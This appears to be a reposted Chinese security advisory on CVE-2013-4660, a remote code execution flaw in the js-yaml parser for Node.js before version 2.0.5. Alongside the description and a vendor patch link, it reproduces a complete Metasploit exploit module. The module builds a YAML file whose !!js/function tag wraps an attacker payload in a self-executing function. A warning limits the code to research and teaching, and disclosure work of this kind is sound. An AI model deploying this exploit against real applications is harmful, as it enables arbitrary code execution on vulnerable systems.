yaml 远程代码执行漏洞(CVE

发布日期:2013-07-01
更新日期:2013-10-14

受影响系统:
js-yaml js-yaml 2.0.4
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 60867
CVE(CAN) ID: CVE-2013-4660

js-yaml是YAML 1.2的JavaScript解析器和串联器。

Node.js的js-yaml模块2.0.5之前版本在解析输入时,没有考虑不安全的!!js/function旗标,可使远程攻击者通过特制的字符串触发eval操作,执行任意代码。

<*来源:Neal Poole
 
  链接:
       
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

include Msf::Exploit::FILEFORMAT

def initialize(info = {})
    super(update_info(info,
      'Name'          => 'Nodejs js-yaml load() Code Exec',
      'Description'    => %q{
        For node.js applications that parse user-supplied YAML input
using the
        load() function from the 'js-yaml' package < 2.0.5, specifying a
self-executing
        function allows us to execute arbitrary javascript code.
      },
      'Author'        => ['joev <jvennix[at]rapid7.com>'],
      'License'        => MSF_LICENSE,
      'References'  =>
        [
          ['CVE', '2013-4660'],
          ['URL',
'https://nealpoole.com/blog/2013/06/code-execution-via-yaml-in-js-yaml-nodejs-module/']
        ],
      'Platform'      => 'nodejs',
      'Arch'          => ARCH_NODEJS,
      'Privileged'    => false,
      'Targets'        =>    [['Automatic', {}]],
      'DisclosureDate' => 'Jun 28 2013',
      'DefaultTarget'  => 0))

register_options([
      OptString.new('FILENAME', [ true, 'The file name.', 'msf.yml'])
    ], self.class)
  end

def exploit
    p = payload.encoded
    print_status("Creating '#{datastore['FILENAME']}' file...")
    file_create("a: !!js/function >\n  (function(){ #{p} })();")
  end
end

建议:
--------------------------------------------------------------------------------
厂商补丁:

js-yaml
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

https://github.com/nodeca/js-yaml

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/c9381df5b22e9d54fcddd134e1603774.html